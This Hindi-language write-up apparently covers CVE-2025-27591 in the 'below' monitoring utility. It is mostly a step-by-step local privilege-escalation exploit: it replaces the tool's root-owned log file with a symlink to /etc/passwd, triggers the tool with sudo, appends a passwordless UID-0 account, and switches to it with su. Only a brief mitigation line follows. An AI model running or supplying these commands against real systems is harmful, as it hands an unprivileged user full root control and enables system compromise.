
CVE-2025-27591 के लिए स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) शोषण, नीचे दिए गए उपयोगिता के लॉगिंग में असुरक्षित सिमलिंक (symlink) हैंडलिंग का दुरुपयोग करके रूट के रूप में मनमानी फ़ाइलों को अधिलेखित (overwrite) करता है।
CVE-2025-27591 below उपयोगिता (पैच किए गए रिलीज़ से पहले के संस्करण) में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जो इसके लॉगिंग तंत्र के भीतर असुरक्षित प्रतीकात्मक लिंक हैंडलिंग के कारण होती है। स्थानीय पहुंच वाले हमलावर इस दोष का फायदा उठाकर रूट उपयोगकर्ता के रूप में मनमानी फ़ाइलों को अधिलेखित कर सकते हैं, जिससे पूर्ण विशेषाधिकार वृद्धि हो सकती है।
below टूल प्रतीकात्मक लिंक को उचित रूप से सत्यापित किए बिना /var/log/below/ में लॉग लिखता है। किसी संवेदनशील फ़ाइल (जैसे, /etc/passwd) की ओर इशारा करते हुए एक सिमलिंक पहले से बनाकर, एक हमलावर उन्नत विशेषाधिकारों के साथ मनमानी सामग्री इंजेक्ट कर सकता है जब कमजोर प्रक्रिया sudo के तहत चलती है।
# जाँचें कि लॉग निर्देशिका मौजूद है या नहीं
test -d /var/log/below && ls -ld /var/log/below
# मौजूदा लॉग फ़ाइल हटाएं और एक दुर्भावनापूर्ण सिमलिंक बनाएं
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# दुर्भावनापूर्ण passwd प्रविष्टि तैयार करें
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# sudo का उपयोग करके कमजोर व्यवहार ट्रिगर करें
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# नव निर्मित रूट-विशेषाधिकार प्राप्त उपयोगकर्ता पर स्विच करें
su attacker
सफल शोषण एक स्थानीय, अन-विशेषाधिकार प्राप्त हमलावर को रूट विशेषाधिकार प्रदान करता है, जिससे पूर्ण सिस्टम समझौता संभव हो जाता है।
/var/log/below/ निर्देशिका तक पहुंच प्रतिबंधित करें।